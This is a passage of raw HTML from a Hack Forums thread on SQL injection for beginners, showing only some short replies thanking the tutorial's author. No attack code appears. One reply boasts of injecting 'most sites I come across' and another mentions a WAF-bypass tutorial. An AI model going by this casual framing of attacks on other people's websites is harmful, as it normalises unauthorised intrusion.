id="post_meta_26322118"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1406490" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=26322118" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26327346" id="pid26327346"></a><table class="tborder" style="margin-top: 5px; " id="post_26327346" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-10-2012, 09:51 PM <span id="edited_by_26327346"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=26327346#pid26327346">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=868609"><span class="group2">mirkops</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 14<br>Posts: 500<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=868609"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26327346">Interesting all the time I bookmarked the ajkaro tutos and posting...really appreciate your work ...thanks so much...!!!</div><div class="post_meta" id="post_meta_26327346"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=868609" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=26327346" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid28251929" id="pid28251929"></a><table class="tborder" style="margin-top: 5px; " id="post_28251929" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">11-20-2012, 06:22 PM <span id="edited_by_28251929"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=28251929#pid28251929">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 60<br>Posts: 1,913<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">120</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_28251929">Perfect
 tutorial! I consider myself better than a noob, but not a pro. 
Somewhere in the middle as I can SQLi most sites I come across, and know
 advanced techniques etc, however this thread slipped under my eye until
 now. Read it, and understand it well. Applied the skills you have shown
 and they work like a charm! Thanks for this, one step closer to 
learning more! <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_28251929"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=28251929" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid28253272" id="pid28253272"></a><table class="tborder" style="margin-top: 5px; " id="post_28253272" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">11-20-2012, 07:22 PM <span id="edited_by_28253272"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=28253272#pid28253272">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1525154"><span class="group2">ScRipT_kId.Die</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 2<br>Posts: 54<br>Joined: Nov 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1525154"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_28253272">nice2x i have some idea now thanks a lot:)</div><div class="post_meta" id="post_meta_28253272"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1525154" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=28253272" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29971332" id="pid29971332"></a><table class="tborder" style="margin-top: 5px; " id="post_29971332" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">01-23-2013, 10:32 AM <span id="edited_by_29971332"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=29971332#pid29971332">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1599898"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/avasploit.png" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1599898"><span class="group2">uSploit</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 5<br>Posts: 92<br>Joined: Dec 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1599898"><strong class="reputation_positive">16</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29971332">Short but clean tutorial.<br>Got an intire tut on Waf bypassing but ill share it with you.<br>Cuz i dont want a 100dred of the same tutorials :)</div><div class="post_meta" id="post_meta_29971332"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1599898" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=29971332" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29994648" id="pid29994648"></a><table class="tborder" style="margin-top: 5px; " id="post_29994648" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">01-24-2013, 04:22 AM <span id="edited_by_29994648"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=29994648#pid29994648">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1512002"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/JJzVN7k.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1512002"><span class="group2">DARK_HORSE</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 3<br>Posts: 125<br>Joined: Oct 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1512002"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29994648">really nice ..<br>great explaining !!<br><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_29994648"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1512002" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=29994648" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (3):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=2853082">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=2853082" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2853082&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-2853082.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->